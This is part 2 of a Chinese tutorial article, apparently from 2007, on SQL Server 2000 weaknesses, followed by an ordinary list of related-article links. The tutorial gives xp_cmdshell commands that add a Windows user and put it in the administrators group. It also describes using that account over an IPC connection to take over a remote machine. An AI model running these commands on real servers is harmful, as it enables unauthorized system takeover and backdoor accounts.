常见SQL Server 2000漏洞及其相关利用(2)

来源:yesky 时间:2007-10-01 14:45:00 

2)、如图3所示,在查询窗口中输入:exec xp_cmdshell 'net user user1 /add',按 执行,如果出现图4"命令成功完成"的提示说明执行成功。
  3)、接着如图5所示,输入exec xp_cmdshell 'net localgroup administrators user1 /add',执行成功后出现图5的提示说明。

   

  图3

   

  图4

   

  图5

  上边输入的 net user user1 /add 和 net localgroup administrators user1 /add是不是很眼熟?它们就是我们上面用过的windows系统下的标准命令。图6可以看出user1已增加到管理员administrators组中。

   

  图6

  看到这明白了吧!通过功能强大的SQL Server可以做Windows系统管理员能做的事。上面通过SQL Server建立用户的实验是我从本机远程连接到测试机的SQL Server,增加了用户,图7是用刚建立的用户user1和远程计算机建立的ipc连接,这时要进入这台机器就是易如反掌的事了。接下来的的安全知识自己查查吧,网上非常多的。

   

  图7

标签:sql,sql,server,漏洞
0
投稿

猜你喜欢

  • PHP数据类型之布尔型的介绍

    2023-11-14 21:56:00
  • SQL Server 2005中插入XML数据方法

    2008-05-26 11:56:00
  • Python pass语句作用和Python assert断言函数的用法

    2021-03-19 12:14:08
  • 简单的文本内容处理工具

    2010-01-28 12:31:00
  • 浅谈vue websocket nodeJS 进行实时通信踩到的坑

    2024-04-10 13:46:38
  • SQL性能优化之定位网络性能问题的方法(DEMO)

    2024-01-13 20:42:17
  • pytorch 可视化feature map的示例代码

    2021-10-21 13:35:49
  • asp 隐藏并修改文件的最后修改时间

    2011-03-29 10:34:00
  • PyCharm 安装与使用配置教程(windows,mac通用)

    2023-08-21 01:15:39
  • 详解MySql的慢查询分析及开启慢查询日志

    2024-01-18 12:56:56
  • python使用itchat实现手机控制电脑

    2023-08-30 20:20:14
  • 分享4个Python中高效省时的技巧

    2021-02-14 22:32:09
  • Python pygame实现中国象棋单机版源码

    2021-04-15 05:34:16
  • SQL Server2008 数据库误删除数据的恢复方法分享

    2024-01-14 10:05:23
  • JavaScript实现九宫格抽奖

    2024-04-16 09:32:06
  • 学习python之编写简单简单连接数据库并执行查询操作

    2024-01-23 05:50:13
  • 解决mysql登录错误:'Access denied for user 'root'@'localhost'

    2024-01-22 16:41:20
  • Python使用微信itchat接口实现查看自己微信的信息功能详解

    2021-07-29 16:07:20
  • css学习笔记:div在IE6下无法遮盖select

    2009-04-30 13:21:00
  • 详解Python中的正则表达式的用法

    2023-07-25 00:23:13
  • asp之家 网络编程 m.aspxhome.com